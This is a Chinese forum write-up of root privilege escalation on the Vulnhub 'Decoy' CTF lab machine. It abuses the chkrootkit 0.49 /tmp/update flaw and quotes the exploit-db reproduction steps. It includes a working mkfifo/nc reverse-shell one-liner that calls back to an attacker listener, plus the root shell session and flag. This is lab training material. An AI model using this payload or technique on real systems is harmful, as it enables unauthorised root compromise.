Vulnhub之Decoy靶机-详细提权过程补充
Vulnhub Decoy提权补充在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t "bash --noprofile"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt 在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的工具。
在第1个目标主机shell中执行:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 233090.00.0 6076 828 pts/1 S+ 22:49 0:00 grep chk从结果发现并没有运行chkrootkit的进程
在第2个shell中执行:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------执行第5选项,也就是病毒扫描,而这可能与chkrootkit相关,也就是一旦选择第5选项,可能就启动chkrootkit。
选择第5选项后,回到第1个shell查看进程:
但是仍然没有出现chkrootkit
此时参考exploitdb上关于0.49版本的漏洞利用方法,在/tmp创建文件名为update,此时内容随意并且赋予执行权限:
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)然后执行honeypot.decoy
此时回到第1个shell中查看进程(需要过一点时间)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 5600.00.0 6076 884 pts/1 S+ 22:59 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 5620.00.0 6076 820 pts/1 S+ 23:00 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root 5712.00.1 26761936 ? S 23:00 0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit发现PS输出结果中有chkrootkit进程,当然到目前为止我们创建的update文件里面的内容是没有意义的字符串,接下来就是修改update的内容,修改为反向shell命令:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update然后再次执行./honeypot.decoy,选择选项5,也就是扫描病毒,
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555
password for kali:
listening on 5555 ...
connect to from (UNKNOWN) 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------4 root root 4.0K Jul72020 .
drwxr-xr-x 18 root root 4.0K Jun 272020 ..
lrwxrwxrwx1 root root 9 Jul72020 .bash_history -> /dev/null
-rw-r--r--1 root root 570 Jan 312010 .bashrc
drwxr-xr-x2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 302009 chkrootkit-0.49
-rw-r--r--1 root root 39K Apr92015 chkrootkit-0.49.tar.gz
drwxr-xr-x3 root root 4.0K Jun 272020 .local
-rw-r--r--1 root root 7.7K Jun 272020 log.txt
-rw-r--r--1 root root 148 Aug 172015 .profile
-rwxr-xr-x1 root root 3.0M Aug 222019 pspy
-rw-r--r--1 root root 924 Jul72020 root.txt
-rw-r--r--1 root root 137 Jul72020 script.sh
-rw-r--r--1 root root 66 Jul72020 .selected_editor
-rw-r--r--1 root root 208 Jun 272020 .wget-hsts
# cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \|/ ....... ........./\
...:::../\\_...... ..._/' \\\_\###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ /x \\\\###//// \//// \___/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** *X
_X _X x * x X_
1c203242ab4b4509233ca210d50d2cc5
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
#
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]